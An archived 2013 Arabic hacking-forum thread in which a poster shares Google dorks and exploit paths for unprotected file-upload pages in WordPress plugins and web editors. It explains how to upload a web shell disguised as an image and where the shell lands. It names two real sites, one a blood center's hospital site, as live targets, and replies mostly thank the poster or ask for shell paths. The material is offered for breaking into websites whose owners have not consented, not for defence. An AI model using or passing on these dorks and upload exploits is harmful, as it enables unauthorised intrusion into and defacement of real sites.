ثغرات upload 2013 +استغلال [الأرشيف] - منتديات جيوش الهكرز

مشاهدة النسخة كاملة : ثغرات upload 2013 +استغلال

Iraqe Hacker

01-25-2013, 08:16 PM

http://files2.fatakat.com/2012/8/13458572631487.gif
احبائي واصدقائي الاعضاء الكرام
ثغرات ابلود ترفع شيل بصيغة صورة
وتكدر من خلال اضافة فايرفوكس لتحويل الصيغ
أكيد تعرفوها Live HTTP headers
ومكان نزول الشيل عليكم لين مدورت الصراحة
http://www.samysoft.net/fmm/fimnew/fwasel/1/101232.gif
الدورك
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html

مثال موقع
http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
وهذا ايضا
http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
============================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
============================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html

============================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html

===========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html

============================================
الدورك
: inurl:plugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php

============================================
http://i32.servimg.com/u/f32/12/32/61/62/74539610.gif
http://www.samysoft.net/fmm/fimnew/nehaya/99087634.gif

shhaby

01-25-2013, 08:31 PM

بارك الله فيك بالتوفيق

Iraqe Hacker

01-25-2013, 10:09 PM

بارك الله فيك بالتوفيق
حياك الله صديقي

- - - تم التحديث - - -

هذول كمان
الدورك
"SelectSurvey.NETv4 site:uk"
الاستغلال
/survey/UploadImagePopup.aspx

============================================
الدورك
Fabriqué par: Safe & Web Company (((( Digital Age ))))
الاستغلال
admin/plugin/file_list_process.php?tablename=galerie&nId=0&size=&bFixedWidth=&bFixedHeight=&nType=0&nAUEindex=0&bTitle=1&bText=0
================================================== =====
الدورك
url:"pdw_file_browser"
الاستغلال
/pdw_file_browser/
مسار النزول
/pdw_file_browser/img/shell.php.jpg

http://ml0k.org/up20127/images/ml0k.org-20698ce659.gif

razorax

01-25-2013, 10:50 PM

Iraqe Hacker

01-25-2013, 11:08 PM

مشكوور أخي على الموضوع ، وبالمناسبة أظنك تقصد أداة tamper data ، ولكنها لا تنجح دائما فالموقع يظهر لك إما خطأ 404 أو يقول لك بأن الصورة لا يمكن عرضها لأنها تحتوي على أخطاء . على العمووم مشكوور وأنا لا أفضل ثغرات مركز التحميل .

مشكور اخي على مرورك بس الهدف هو للمبتدئين للمحاولات
والتعلم والتقدم في هذا المجال والاداة صحيح مودائما تنجح
تحياتي

Mr.JnOoN

01-25-2013, 11:13 PM

تسلم على روعه طرحك

Iraqe Hacker

01-25-2013, 11:20 PM

تسلم على روعه طرحك
الروعه في ردك الجميل خيو:redface:

falcon-m

01-26-2013, 09:01 PM

تسلم حبيبى على الشرح

Iraqe Hacker

01-26-2013, 10:07 PM

تسلم حبيبى على الشرح
الله يسلمك يا غالي:cool:

Jordan Ghost

01-26-2013, 11:32 PM

طرح جميل أخي عراقي هكر والله كفوو لكن ما احب هذي الثغرات مفيدة جدا للمبتدئين على كلا تقبل مروري

Iraqe Hacker

01-26-2013, 11:48 PM

طرح جميل أخي عراقي هكر والله كفوو لكن ما احب هذي الثغرات مفيدة جدا للمبتدئين على كلا تقبل مروري
تشرفت بمرورك خيو:redface:

hamzaafire

01-26-2013, 11:51 PM

مشكور اخي على الموضوع باين تعبان عليه

اكيد راح استفاد منة لما اتعلم اختراق المواقع<<<يحلم

Iraqe Hacker

01-26-2013, 11:58 PM

مشكور اخي على الموضوع باين تعبان عليه

اكيد راح استفاد منة لما اتعلم اختراق المواقع<<<يحلم
هلا خيي ليش حلم قابل اني من ولدتني امي اعرف الاختراق
بلتوفيق

الذئب الاسود العراقي

01-27-2013, 12:31 AM

عبالك اني هندي مو عراقي ععععععععععععععععععععععععع ععععععععععععععععععععععععع عععععععععععععععععع

- - - تم التحديث - - -

نذر عليه بس اخترق موقع اوزع جكليت لكل اعضاء المنتدى:tongue:

Iraqe Hacker

01-27-2013, 05:41 PM

نذر عليه بس اخترق موقع اوزع جكليت لكل اعضاء المنتدى:tongue:

لا عود وزع كعك وجاي:confused:

safi syrian

01-27-2013, 05:55 PM

مشكوور أخي الله يعطيك العافية

Iraqe Hacker

01-27-2013, 05:59 PM

مشكوور أخي الله يعطيك العافية
الله ايعافيك صديقي

الجليد المشتعل

01-27-2013, 06:35 PM

مشكؤؤؤؤؤؤر يعطيك العافية

Iraqe Hacker

01-27-2013, 06:38 PM

مشكؤؤؤؤؤؤر يعطيك العافية
الله يعافيك صديقي الغالي

uuser54822

01-28-2013, 12:17 AM

بارك الله فيك طرح جميل

Iraqe Hacker

01-28-2013, 12:26 AM

بارك الله فيك طرح جميل
شكرا لمرورك صديقي بارك الله فيك:redface:

ع ـآزف الاحزان

01-30-2013, 07:05 PM

intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html

اين مسار الشل
؟؟؟؟

Iraqe Hacker

01-30-2013, 07:10 PM

intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html

اين مسار الشل
؟؟؟؟
يا اخي موذكرت بداية الموضوع مسار الشل معرفتا جاهد نفسك وبحث عن الملفات قابل بس على الحاضر ههههههه
هاك هذا الموقع يضهرلك ملفات الموقع بس خلي رابط الموقع وضغط الكلمة في الاسفل
http://madnet.name/tools/madss/

Iraqe Hacker

01-30-2013, 10:06 PM

مشكوور على المجهود واصل يا غالي

شكرا لمرورك صديقي

hamzads

01-31-2013, 12:31 AM

مشــــــكور أخـــــــــــي علــــــــــى المــــــــــوضوع

Iraqe Hacker

01-31-2013, 12:34 AM

مشــــــكور أخـــــــــــي علــــــــــى المــــــــــوضوع

شكرا لمرورك اخي

عبدالله97

02-02-2013, 01:26 PM

http://www.samysoft.net/forumim/shokr/4/fgsgsdg.gif

Iraqe Hacker

02-02-2013, 01:32 PM

http://www.samysoft.net/forumim/shokr/4/fgsgsdg.gif
http://www.samysoft.net/fmm/fimnew/shokrmror/1/ouipuiopui.gif

سارة الغامدي

02-11-2013, 08:08 PM

مشكؤر
يعطيك العافية

Iraqe Hacker

02-11-2013, 08:10 PM

مشكؤر
يعطيك العافية

الله يعافيك اختي العزيزة

hackerpk

02-11-2013, 10:01 PM

merciii ya akhii wasillll

Iraqe Hacker

02-11-2013, 10:05 PM

merciii ya akhii wasillll
Nous vous remercions de votre mot de passe chérie chérie

mem1hack

02-11-2013, 10:19 PM

شرح روعة مشكور

Iraqe Hacker

02-11-2013, 10:35 PM

شرح روعة مشكور

شكرا لمرورك صديقي

سرمد المهندس

02-12-2013, 10:42 AM

مشكوووووووووووووووووووووو ووووووووور

Iraqe Hacker

02-12-2013, 12:58 PM

http://www.samysoft.net/fmm/fimnew/shokrmror/2/91894543.gif

hamzads

02-12-2013, 05:03 PM

شكـــــــــــــراا علــى الـدروكـات :redface:

Iraqe Hacker

02-12-2013, 05:05 PM

شكـــــــــــــراا علــى الـدروكـات :redface:
http://www.karom.net/up/uploads/13255034175.gif

التعلوب

02-12-2013, 05:17 PM

شكراااااااااااااااااااااا اااااااااً

Iraqe Hacker

02-12-2013, 05:25 PM

شكراااااااااااااااااااااا اااااااااً
http://www.karom.net/up/uploads/13253392791.gif

WALEED HaCKeR

02-12-2013, 07:02 PM

بآآركـ الله فيك .. تم التقييم

Iraqe Hacker

02-12-2013, 07:06 PM

بآآركـ الله فيك .. تم التقييم

http://www.karom.net/up/uploads/13255034175.gif